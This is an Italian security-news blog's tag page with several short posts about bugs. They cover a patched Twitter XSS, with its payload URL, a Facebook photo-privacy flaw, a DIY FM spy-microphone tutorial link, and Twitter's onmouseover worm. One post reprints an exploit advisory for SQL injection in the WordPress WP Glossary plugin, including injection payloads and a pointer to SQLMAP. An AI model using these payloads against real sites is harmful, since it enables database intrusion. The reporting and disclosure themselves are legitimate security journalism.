Articoli con tag bug

Vulnerabilità XSS trovata su Twitter da un 15enne

1 mese fa

Scritto da Rocco Musolino in Cross site scripting, News

Un 15enne ha scoperto pochi giorni fa una vulnerabilità di tipo XSS (Cross site scripting) su Twitter. Il link alla vulnerabilità è questo:

https://dev.twitter.com/docs/follow-button#%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert%28%22Xss-Found-By-Belmin%28~!White!~%29%22%29//%22%3E

Il bug è stato prontamente fixato, quindi non è più utilizzabile.
Oltre al bug su facebook, lo stesso utente assicura di aver trovato un’altra XSS su Facebook, e gli sono stati offerti 700 dollari da Facebook, come ricompensa.

Bug nella privacy di Facebook – Le foto personali di Mark in rete.

1 mese fa

Scritto da Rocco Musolino in News

Un bug nel sistema di gestione della Privacy su facebook, ha presumibilmente reso possibile il download di alcune fotografie private, appartenenti al capo esecutivo di Facebook, Marck Zuckemberg.
Circa 14 foto di Mr. Zuckemberg sono comparse in rete con la dicitura “E’ tempo di riparare questi difetti di sicurezza su Facebook“. Questa falla permetteva agli utenti di accedere a foto per loro private. Il colosso di Palo Alto, conferma che si è trattato di una debolezza temporanea, ora corretta.
Questa è la risposta ufficiale che giunge dal sito in blu:

Earlier today, we discovered a bug in one of our reporting flows that allows people to report multiple instances of inappropriate content simultaneously. The bug allowed anyone to view a limited number of another user’s most recently uploaded photos irrespective of the privacy settings for these photos. This was the result of one of our recent code pushes and was live for a limited period of time.

Lo stesso Zuckemberg ha detto che Facebook, protegge le informazioni personali dei propri utenti, meglio di ogni altra compagnia al mondo.

bug difetti facebook flaws Foto marck zuckemberg privacy sicurezza

Nuovo Exploit sfrutta un bug di WP Glossary

3 mesi fa

Scritto da Rocco Musolino in Exploit, SQL injection

In data 30/10/2011 un nuovo bug è stato riscontrato nel Plug-in per WordPress: WP Glossary.
Attraverso una vulnerabilità di tipo SQL Injection e l’exploit qui sotto riportato (è consigliato l’utilizzo di tool come SQLMAP), è possibile sfruttare tale vulnerabilità.
E’ consigliabile dunque aggiornare il plug-in.

######################################################
# Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
# Date: 2011-30-10
# Author: longrifle0x
# software: Wordpress
# Download: http://wordpress.org/extend/plugins/wp-glossary/
# Tools: SQLMAP
######################################################
 
*DESCRIPTIONDiscovered a vulnerability in WP Glossary, Wordpress Plugin,
vulnerability is SQL injection.
File: wp-content/plugins/wp-glossary/ajax.php
Exploit: id=-1; or 1=if
 
*Exploitation*
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
 [GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
 [GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/
wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)
 
 
***Greetz: Georgian Underground Community***

bug Exploit wordpress wp glossary

La vostra prima cimice spia con trasmissione radio

10 mesi fa

Scritto da Rocco Musolino in Arduino ed elettronica, Tips and Tricks, Youtube

Semplice progetto elettronico tramite il quale è possibile trasmettere qualsiasi tipo di conversazione tramite segnale radio FM.
Il raggio d’azione è solitamente basso, intorno ai 30 metri. Ma è eccellente per la tipologia di progetto.

Ciò di cui avete bisogno per iniziare è un piccolo contenitore di plastica e qualche abilità da saldatore per la PCB. Il resto del materiale si divide fra: transistor, condensatori, resistenze, batteria a bottone ed un microfono.

Ovviamente, registrare ed ascoltare conversazioni senza permesso è illegale. Prestate attenzione a ciò che fate.

Il tutorial completo su come realizzare questa piccola cimice spia, lo trovate sul sito di PyroElectro, insieme ad altri curiosissimi progetti.

bug cimice diy FM microfono pcb radio spia spy tutorial

Twitter Hackerato nuovamente da pirati informatici!

1 anno fa

Scritto da Rocco Musolino in Cross site scripting, Hacking, News

Il popolare sito web Twitter e’ stato attaccato un’altra volta! da pirati che hanno sfruttato vulnerabilita’ esistenti nel suo sistema di sicurezza. Non è la prima volta che Twitter viene colpito, nella home page del sito e’ apparsa la scritta ‘Twitter got hacked’ mentre gli utenti hanno visto scattare il collegamento ad altri siti anche solo facendo transitare il mouse sopra un link, JavaScript (”onmouseover”), Tra le vittime dei pirati c’e’ anche il portavoce della Casa Bianca Robert Gibbs che ha fatto sapere, sempre via Twitter, che il suo twitter era ”impazzito”. Twitter dovrebbe controllare più attentamente la sua infrastruttura di rete, aggiornare applicazioni di rete obsolete e dar maggiori rilevanza all’IT security. Dovrebbe altresì addestrare il suo personale al fine di non essere vittime di attacchi mirati di Social Engineering.

È in corso un attacco nei confronti di Twitter basato su del codice JavaScript inserito nei tweet di ignari utenti.
Si tratta di un XSS (Cross Site Scripting) di cui più volte abbiamo discusso su questo blog, ben congegnato che permette il propagarsi del codice JavaScript in modo virale da account ad account in modo simile a quanto avviene nei worm.

AGGIORNAMENTO ore 15:59: Twitter ha comunicato attraverso il proprio account Safety di aver corretto la falla XSS.